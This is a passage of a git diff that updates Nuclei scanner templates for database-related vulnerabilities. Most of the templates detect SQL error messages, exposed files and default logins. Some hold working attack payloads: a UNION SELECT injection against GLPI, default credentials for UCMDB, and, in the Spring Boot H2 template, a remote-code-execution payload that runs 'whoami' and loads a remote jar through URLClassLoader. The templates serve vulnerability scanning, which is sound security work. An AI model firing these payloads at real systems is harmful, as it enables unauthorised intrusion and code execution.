CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + metadata: + max-request: 1 + tags: sqli,generic,error + +http: - method: GET path: - "{{BaseURL}}/'" + matchers-condition: and matchers: - type: word @@ -17,6 +26,7 @@ requests: # False Positive part: body negative: true + - type: regex regex: # MySQL @@ -201,6 +211,7 @@ requests: - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" condition: or + extractors: - type: regex name: MySQL @@ -217,20 +228,24 @@ requests: - "Pdo[./_\\\\]Mysql" - "MySqlException" - "SQLSTATE[\\d+]: Syntax error or access violation" + - type: regex name: MariaDB regex: - "check the manual that (corresponds to|fits) your MariaDB server version" + - type: regex name: Drizzel regex: - "check the manual that (corresponds to|fits) your Drizzle server version" + - type: regex name: MemSQL regex: - "MemSQL does not support this type of query" - "is not supported by MemSQL" - "unsupported nested scalar subselect" + - type: regex name: PostgreSQL regex: @@ -246,6 +261,7 @@ requests: - "org\\.postgresql\\.jdbc" - "Pdo[./_\\\\]Pgsql" - "PSQLException" + - type: regex name: MicrosoftSQLServer regex: @@ -268,6 +284,7 @@ requests: - "Pdo[./_\\\\](Mssql|SqlSrv)" - "SQL(Srv|Server)Exception" - "Unclosed quotation mark after the character string" + - type: regex name: MicrosoftAccess regex: @@ -276,6 +293,7 @@ requests: - "Access Database Engine" - "ODBC Microsoft Access" - "Syntax error \\(missing operator\\) in query expression" + - type: regex name: Oracle regex: @@ -290,6 +308,7 @@ requests: - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - "Pdo[./_\\\\](Oracle|OCI)" - "OracleException" + - type: regex name: IBMDB2 regex: @@ -302,6 +321,7 @@ requests: - "Pdo[./_\\\\]Ibm" - "DB2Exception" - "ibm_db_dbi\\.ProgrammingError" + - type: regex name: Informix regex: @@ -313,6 +333,7 @@ requests: - "weblogic\\.jdbc\\.informix" - "Pdo[./_\\\\]Informix" - "IfxException" + - type: regex name: Firebird regex: @@ -320,6 +341,7 @@ requests: - "Warning.*?\\Wibase_" - "org\\.firebirdsql\\.jdbc" - "Pdo[./_\\\\]Firebird" + - type: regex name: SQLite regex: @@ -334,6 +356,7 @@ requests: - "org\\.sqlite\\.JDBC" - "Pdo[./_\\\\]Sqlite" - "SQLiteException" + - type: regex name: SAPMaxDB regex: @@ -343,6 +366,7 @@ requests: - "-3014.*?Invalid end of SQL statement" - "com\\.sap\\.dbtech\\.jdbc" - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + - type: regex name: Sybase regex: @@ -352,6 +376,7 @@ requests: - "SybSQLException" - "Sybase\\.Data\\.AseClient" - "com\\.sybase\\.jdbc" + - type: regex name: Ingres regex: @@ -359,6 +384,7 @@ requests: - "Ingres SQLSTATE" - "Ingres\\W.*?Driver" - "com\\.ingres\\.gcf\\.jdbc" + - type: regex name: FrontBase regex: @@ -366,29 +392,34 @@ requests: - "com\\.frontbase\\.jdbc" - "Syntax error 1. Missing" - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + - type: regex name: HSQLDB regex: - "Unexpected end of command in statement \\[" - "Unexpected token.*?in statement \\[" - "org\\.hsqldb\\.jdbc" + - type: regex name: H2 regex: - "org\\.h2\\.jdbc" - "\\[42000-192\\]" + - type: regex name: MonetDB regex: - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - "\\[MonetDB\\]\\[ODBC Driver" - "nl\\.cwi\\.monetdb\\.jdbc" + - type: regex name: ApacheDerby regex: - "Syntax error: Encountered" - "org\\.apache\\.derby" - "ERROR 42X01" + - type: regex name: Vertica regex: @@ -397,12 +428,14 @@ requests: - "com\\.vertica\\.jdbc" - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - "com\\.vertica\\.dsi\\.dataengine" + - type: regex name: Mckoi regex: - "com\\.mckoi\\.JDBCDriver" - "com\\.mckoi\\.database\\.jdbc" - "<REGEX_LITERAL>" + - type: regex name: Presto regex: @@ -410,29 +443,35 @@ requests: - "io\\.prestosql\\.jdbc" - "com\\.simba\\.presto\\.jdbc" - "UNION query has different number of fields: \\d+, \\d+" + - type: regex name: Altibase regex: - "Altibase\\.jdbc\\.driver" + - type: regex name: MimerSQL regex: - "com\\.mimer\\.jdbc" - "Syntax error,[^\\n]+assumed to mean" + - type: regex name: CrateDB regex: - "io\\.crate\\.client\\.jdbc" + - type: regex name: Cache regex: - "encountered after end of query" - "A comparison operator is required here" + - type: regex name: RaimaDatabaseManager regex: - "-10048: Syntax error" - "rdmStmtPrepare\\(.+?\\) returned" + - type: regex name: Virtuoso regex: @@ -441,3 +480,4 @@ requests: - "SQ200: No table " - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" +# digest: 4a0a0047304502202747aa1e6dea39e23e6100799bf4245c850a07895e151d189123dc27803dc2e5022100c8ebed9058d9d8dc5f249a93d40c1391ef22f5218d67cfa621679988285968dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/sql/exposed-adb-7280.yaml b/poc/sql/exposed-adb-7280.yaml index e0a43b6ba2..9a1aedf542 100644 --- a/poc/sql/exposed-adb-7280.yaml +++ b/poc/sql/exposed-adb-7280.yaml @@ -3,7 +3,7 @@ info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: critical - tags: network,adb,rce,android + tags: network,adb,rce reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge network: - inputs: diff --git a/poc/sql/exposed-mysql-initial-7324.yaml b/poc/sql/exposed-mysql-initial-7324.yaml index f644e79c49..3df4611d59 100644 --- a/poc/sql/exposed-mysql-initial-7324.yaml +++ b/poc/sql/exposed-mysql-initial-7324.yaml @@ -4,7 +4,8 @@ info: name: Exposed mysql.initial author: ELSFA7110 severity: info - reference: https://hackerone.com/reports/1081817 + reference: + - https://hackerone.com/reports/1081817 tags: config,exposure requests: diff --git a/poc/sql/exposed-sqlite-manager-7350.yaml b/poc/sql/exposed-sqlite-manager-7350.yaml index 6a86dc4ca9..cff80e3ad5 100644 --- a/poc/sql/exposed-sqlite-manager-7350.yaml +++ b/poc/sql/exposed-sqlite-manager-7350.yaml @@ -1,19 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium - reference: - - https://www.exploit-db.com/ghdb/5003 + reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql/glpi-9.3.3-sql-injection(1).yaml b/poc/sql/glpi-9.3.3-sql-injection(1).yaml index 98a2a439f1..e7c97f72d9 100644 --- a/poc/sql/glpi-9.3.3-sql-injection(1).yaml +++ b/poc/sql/glpi-9.3.3-sql-injection(1).yaml @@ -1,25 +1,30 @@ -id: GLPI_SQL_Injection -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" -requests: - - matchers: - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" +--- +id: GLPI_SQL_Injection + +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" + +requests: + - + matchers: + - + part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file diff --git a/poc/sql/glpi-9.3.3-sql-injection.yaml b/poc/sql/glpi-9.3.3-sql-injection.yaml new file mode 100644 index 0000000000..98a2a439f1 --- /dev/null +++ b/poc/sql/glpi-9.3.3-sql-injection.yaml @@ -0,0 +1,25 @@ +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql/insecure-firebase-database-8161.yaml b/poc/sql/insecure-firebase-database-8161.yaml index 31850d7a49..6bf3294029 100644 --- a/poc/sql/insecure-firebase-database-8161.yaml +++ b/poc/sql/insecure-firebase-database-8161.yaml @@ -1,26 +1,32 @@ id: insecure-firebase-database info: - name: Firebase Database Permissions Exploit Check + name: Insecure Firebase Database author: rafaelwdornelas severity: high description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database. reference: - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty - tags: firebase + metadata: + verified: true + tags: firebase,google,misconfig requests: - raw: - - | # REQUEST 1 - PUT /nuclei.json HTTP/1.1 + - | + PUT /{{randstr}}.json HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - {"email":"{{randstr}}@example.com","password":"{{randstr_1}}","username":"{{randstr_2}}","nuclei":"insecure-firebase-database"} + {"id":"insecure-firebase-database"} + - | + GET /{{randstr}}.json HTTP/1.1 + Host: {{Hostname}} + req-condition: true matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "insecure-firebase-database" + - '{"id":"insecure-firebase-database"}' - type: status status: - 200 diff --git a/poc/sql/jdbc-connection-string-8244.yaml b/poc/sql/jdbc-connection-string-8244.yaml index 5176854480..53cc0bba82 100644 --- a/poc/sql/jdbc-connection-string-8244.yaml +++ b/poc/sql/jdbc-connection-string-8244.yaml @@ -1,15 +1,18 @@ id: jdbc-connection-string + info: name: JDBC Connection String Disclosure author: Ice3man - severity: info + severity: unknown tags: exposure,token + requests: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' + - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' \ No newline at end of file diff --git a/poc/sql/mongodb-detect-8921.yaml b/poc/sql/mongodb-detect-8921.yaml index a81bd83ef0..9e08d299ab 100644 --- a/poc/sql/mongodb-detect-8921.yaml +++ b/poc/sql/mongodb-detect-8921.yaml @@ -3,8 +3,7 @@ info: name: MongoDB Detection author: pdteam severity: info - reference: - - https://github.com/orleven/Tentacle + reference: https://github.com/orleven/Tentacle tags: network,mongodb network: - inputs: diff --git a/poc/sql/mongodb-unauth-8925.yaml b/poc/sql/mongodb-unauth-8925.yaml index 469fd95eb9..9883dc2bca 100644 --- a/poc/sql/mongodb-unauth-8925.yaml +++ b/poc/sql/mongodb-unauth-8925.yaml @@ -1,14 +1,21 @@ id: mongodb-unauth + info: name: Unauth MongoDB Disclosure author: pdteam severity: high - reference: https://github.com/orleven/Tentacle + reference: + - https://github.com/orleven/Tentacle + - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb + - https://www.mongodb.com/features/mongodb-authentication + remediation: Enable Authentication in MongoDB tags: network,mongodb,unauth + network: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 type: hex + host: - "{{Hostname}}" - "{{Host}}:27017" diff --git a/poc/sql/openerp-database-9278.yaml b/poc/sql/openerp-database-9278.yaml index c1496427ba..7d9f2c6a84 100644 --- a/poc/sql/openerp-database-9278.yaml +++ b/poc/sql/openerp-database-9278.yaml @@ -1,18 +1,22 @@ id: openerp-database + info: name: OpenERP database instances author: impramodsargar severity: info - tags: openerp + tags: openerp,panel + requests: - method: GET path: - "{{BaseURL}}/web/database/selector/" + matchers-condition: and matchers: - type: word words: - 'Odoo' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/sql/oracle-dbcs-9355.yaml b/poc/sql/oracle-dbcs-9355.yaml index 4dd45891c6..11ebe4ceb0 100644 --- a/poc/sql/oracle-dbcs-9355.yaml +++ b/poc/sql/oracle-dbcs-9355.yaml @@ -1,23 +1,24 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs + +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + + - type: status + status: + - 200 diff --git a/poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml b/poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml index c3ced8553c..44c22c100b 100644 --- a/poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml +++ b/poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml @@ -1,15 +1,17 @@ id: oracle-ebs-sqllog-disclosure + info: name: Oracle EBS SQL Log Disclosure author: dhiyaneshDk severity: medium - reference: - - https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ tags: oracle,ebs,logs,exposure + reference: https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ + requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' + matchers-condition: and matchers: - type: word @@ -17,10 +19,12 @@ requests: - "DESCRIPTION=" - "USER=" part: body + - type: word words: - "text/plain" part: header + - type: status status: - 200 diff --git a/poc/sql/pbootcms-database-file-download-9469.yaml b/poc/sql/pbootcms-database-file-download-9469.yaml index 88da4df001..9781cd9421 100644 --- a/poc/sql/pbootcms-database-file-download-9469.yaml +++ b/poc/sql/pbootcms-database-file-download-9469.yaml @@ -1,4 +1,5 @@ id: pbootcms-database-file-download + info: name: PbootCMS v2.0.7 - pbootcms.db File Download author: ritikchaddha @@ -7,10 +8,12 @@ info: - https://xz.aliyun.com/t/7628 - https://www.cnblogs.com/0daybug/p/12786036.html tags: pbootcms,db,exposure,database,sqlite + requests: - method: GET path: - "{{BaseURL}}/data/pbootcms.db" + max-size: 20000 matchers-condition: and matchers: @@ -20,6 +23,7 @@ requests: - "PbootCMS" - "SQLite format 3" condition: and + - type: status status: - 200 diff --git a/poc/sql/powerpress-449cbf711de87857af4b230f1462edb6.yaml b/poc/sql/powerpress-449cbf711de87857af4b230f1462edb6.yaml new file mode 100644 index 0000000000..e1010fe788 --- /dev/null +++ b/poc/sql/powerpress-449cbf711de87857af4b230f1462edb6.yaml @@ -0,0 +1,59 @@ +id: powerpress-449cbf711de87857af4b230f1462edb6 + +info: + name: > + PowerPress Podcasting plugin by Blubrry <= 11.9.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via media_url Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/745262f6-4f73-453e-b650-15115536f221?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/powerpress/" + google-query: inurl:"/wp-content/plugins/powerpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,powerpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/powerpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "powerpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 11.9.10') \ No newline at end of file diff --git a/poc/sql/puppetdb-detect-9718.yaml b/poc/sql/puppetdb-detect-9718.yaml index 6373cddfa6..24d5503e44 100644 --- a/poc/sql/puppetdb-detect-9718.yaml +++ b/poc/sql/puppetdb-detect-9718.yaml @@ -1,33 +1,28 @@ id: puppetdb-detect - info: name: PuppetDB Detection author: c-sh0 severity: info - reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version + reference: + - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure - requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: - 'application/json' - - type: word part: body words: - '"version"' - extractors: - type: regex group: 1 diff --git a/poc/sql/python-app-sql-exceptions-9744.yaml b/poc/sql/python-app-sql-exceptions-9744.yaml index cf31580c01..43edeb6632 100644 --- a/poc/sql/python-app-sql-exceptions-9744.yaml +++ b/poc/sql/python-app-sql-exceptions-9744.yaml @@ -1,10 +1,11 @@ id: python-app-sql-exceptions info: name: Python App SQL Exception Check - description: Generic check for SQL exceptions in Python according to PEP 249 - reference: https://www.python.org/dev author: geeknik severity: medium + description: Generic check for SQL exceptions in Python according to PEP 249 + reference: + - https://www.python.org/dev tags: file,logs,python,sql file: - extensions: diff --git a/poc/sql/save-as-pdf-by-pdfcrowd-6b6b69f772d7fc2cbdb3b9d93f6ab72a.yaml b/poc/sql/save-as-pdf-by-pdfcrowd-6b6b69f772d7fc2cbdb3b9d93f6ab72a.yaml new file mode 100644 index 0000000000..25d16e3981 --- /dev/null +++ b/poc/sql/save-as-pdf-by-pdfcrowd-6b6b69f772d7fc2cbdb3b9d93f6ab72a.yaml @@ -0,0 +1,59 @@ +id: save-as-pdf-by-pdfcrowd-6b6b69f772d7fc2cbdb3b9d93f6ab72a + +info: + name: > + Save as PDF plugin by Pdfcrowd <= 4.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/30dbc840-e281-405c-82ed-7f92761db8ae?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/save-as-pdf-by-pdfcrowd/" + google-query: inurl:"/wp-content/plugins/save-as-pdf-by-pdfcrowd/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,save-as-pdf-by-pdfcrowd,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/save-as-pdf-by-pdfcrowd/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "save-as-pdf-by-pdfcrowd" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.0') \ No newline at end of file diff --git a/poc/sql/sequoiadb-default-login-10152.yaml b/poc/sql/sequoiadb-default-login-10152.yaml index 39348896d3..bbef4dfd07 100644 --- a/poc/sql/sequoiadb-default-login-10152.yaml +++ b/poc/sql/sequoiadb-default-login-10152.yaml @@ -3,8 +3,15 @@ info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high - description: Searches for default admin credentials for the SequoiaDB application. + description: SequoiaDB default admin credentials were discovered. tags: default-login,sequoiadb + reference: + - https://www.sequoiadb.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -35,3 +42,5 @@ requests: part: body words: - '{ "errno": 0 }' + +# Enhanced by mp on 2022/03/11 diff --git a/poc/sql/simple-crm-sql-injection-10277.yaml b/poc/sql/simple-crm-sql-injection-10277.yaml index 37cbb2fe5a..07c22d6f71 100644 --- a/poc/sql/simple-crm-sql-injection-10277.yaml +++ b/poc/sql/simple-crm-sql-injection-10277.yaml @@ -1,15 +1,9 @@ id: simple-crm-sql-injection info: - name: Simple CRM 3.0 SQL Injection and Authentication Bypass + name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass author: geeknik severity: high - description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. - reference: - - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 + reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt tags: sqli,simplecrm,auth-bypass,injection requests: - method: POST @@ -29,5 +23,3 @@ requests: words: - "text/html" part: header - -# Enhanced by mp on 2022/03/30 diff --git a/poc/sql/springboot-h2-db-rce-10458.yaml b/poc/sql/springboot-h2-db-rce-10458.yaml index 55cc32c9ad..b3eb638c72 100644 --- a/poc/sql/springboot-h2-db-rce-10458.yaml +++ b/poc/sql/springboot-h2-db-rce-10458.yaml @@ -3,31 +3,35 @@ info: name: Spring Boot H2 Database RCE author: dwisiswant0 severity: critical - reference: + tags: springboot,rce + # Payload taken from @pyn3rd (Twitter), see reference[2]. + reference: | - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce - metadata: - shodan-query: http.favicon.hash:116323821 - tags: springboot,rce,jolokia requests: - - raw: - - | - POST /actuator/env HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "name":"spring.datasource.hikari.connection-test-query", - "value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');" - } + - method: POST + path: + - "{{BaseURL}}/actuator/env" + headers: + Content-Type: "application/json" + body: | + { + "name": "spring.datasource.hikari.connection-init-sql", + "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()" + } matchers-condition: and matchers: - type: status status: - 200 - type: word + words: + - "\"spring.datasource.hikari.connection-init-sql\":\"" + condition: and part: body + - type: word words: - - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT' + - "application/vnd.spring-boot.actuator" + part: header diff --git a/poc/sql/sql-server-reporting-10510.yaml b/poc/sql/sql-server-reporting-10510.yaml index bb0fa2dd5b..4e97bee905 100644 --- a/poc/sql/sql-server-reporting-10510.yaml +++ b/poc/sql/sql-server-reporting-10510.yaml @@ -1,9 +1,11 @@ id: sql-server-reporting + info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info - tags: tech,micrsoft + tags: tech,microsoft + requests: - method: GET path: diff --git a/poc/sql/symfony-database-config-10615.yaml b/poc/sql/symfony-database-config-10615.yaml index cd509df228..d73e68a056 100644 --- a/poc/sql/symfony-database-config-10615.yaml +++ b/poc/sql/symfony-database-config-10615.yaml @@ -1,9 +1,11 @@ id: symfony-database-config + info: name: Symfony Database Configuration Exposure author: pdteam,geeknik severity: high tags: config,exposure,symfony + requests: - method: GET path: diff --git a/poc/sql/tidb-unauth-10772.yaml b/poc/sql/tidb-unauth-10772.yaml index b12e481689..d556c31a53 100644 --- a/poc/sql/tidb-unauth-10772.yaml +++ b/poc/sql/tidb-unauth-10772.yaml @@ -11,7 +11,7 @@ info: network: - inputs: - read: 1024 # skip handshake packet - - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication type: hex host: diff --git a/poc/sql/ucmdb-default-login-10869.yaml b/poc/sql/ucmdb-default-login-10869.yaml index 53793d5fff..7f92b3251a 100644 --- a/poc/sql/ucmdb-default-login-10869.yaml +++ b/poc/sql/ucmdb-default-login-10869.yaml @@ -1,14 +1,17 @@ id: ucmdb-default-login + info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 + and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: cwe-id: CWE-798 tags: ucmdb,default-login + requests: - raw: - | @@ -16,17 +19,20 @@ requests: Host: {{Hostname}} customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + attack: pitchfork payloads: username: - diagnostics password: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: diff --git a/poc/sql/unauthenticated-influxdb-10903.yaml b/poc/sql/unauthenticated-influxdb-10903.yaml index 063d0eedc5..9725f2a6e7 100644 --- a/poc/sql/unauthenticated-influxdb-10903.yaml +++ b/poc/sql/unauthenticated-influxdb-10903.yaml @@ -1,4 +1,5 @@ id: unauthenticated-influxdb + info: name: Unauthentication InfluxDB Detection author: pussycat0x @@ -6,10 +7,12 @@ info: metadata: shodan-dork: InfluxDB tags: unauth,db,influxdb,misconfig + requests: - method: GET path: - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - '"results":' - '"name":"databases"' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/sql/woo-wallet-39d0e9bf98ca6e67db16261da42d6252.yaml b/poc/sql/woo-wallet-39d0e9bf98ca6e67db16261da42d6252.yaml new file mode 100644 index 0000000000..a9e13078dd --- /dev/null +++ b/poc/sql/woo-wallet-39d0e9bf98ca6e67db16261da42d6252.yaml @@ -0,0 +1,59 @@ +id: woo-wallet-39d0e9bf98ca6e67db16261da42d6252 + +info: + name: > + Wallet for WooCommerce <= 1.5.4 - Authenticated (Subscriber+) SQL Injection via 'search[value]' + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f7d5a077-8836-4c28-8884-5047585a99e5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-wallet/" + google-query: inurl:"/wp-content/plugins/woo-wallet/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-wallet,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-wallet/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: 